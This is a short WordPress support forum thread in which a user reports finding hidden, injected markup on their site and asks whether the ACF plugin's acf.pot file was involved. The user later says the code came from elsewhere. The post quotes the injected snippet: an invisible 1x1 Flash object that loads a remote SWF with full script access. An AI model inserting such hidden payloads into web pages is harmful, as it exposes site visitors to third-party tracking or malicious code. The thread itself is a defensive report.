Support

Account

Home Forums General Issues acf.pot file vulnerable to attack

Solved

acf.pot file vulnerable to attack

  • wp-content/plugins/advanced-custom-fields/lang/acf.pot

    I had a malicious Shockwave Flash object embedded in my site and I ran Wordfence to find out what the problem was. My menu.php file had been modified, but also the ACF file listed above.

    Here’s the code that ended up in my index.php page:

    <div style=”position: absolute; top: 0px; left: 0px; width: 1px; height: 1px; z-index: 2147483647; ” id=”_GPL_e6a00_parent_div”>
    <object type=”application/x-shockwave-flash” id=”_GPL_e6a00_swf” data=”http://savingsslider-a.akamaihd.net/items/e6a00/storage.swf?r=1&#8243; width=”1″ height=”1″>
    <param name=”wmode” value=”transparent”>
    <param name=”allowscriptaccess” value=”always”>
    <param name=”flashvars” value=”logfn=_GPL.items.e6a00.log&onload=_GPL.items.e6a00.onload&onerror=_GPL.items.e6a00.onerror&LSOName=gpl”>
    </object>
    </div>

    Please let me know if this is a known problem. Thanks.

  • Hi @jmenon

    Thanks for the info. I’m not sure what I can do about this at the moment. Is this affecting all wordpress plugins that have a .pot file?

    Thanks
    E

  • Actually I just found out an hour ago that that code didn’t come from your plugin. I had a complicated mix of things going on, but when I ran Wordfence your .pot file came up as being tampered with, so you might want to look into that. Otherwise, I’m resolved. Thanks for the response.

Viewing 3 posts - 1 through 3 (of 3 total)

The topic ‘acf.pot file vulnerable to attack’ is closed to new replies.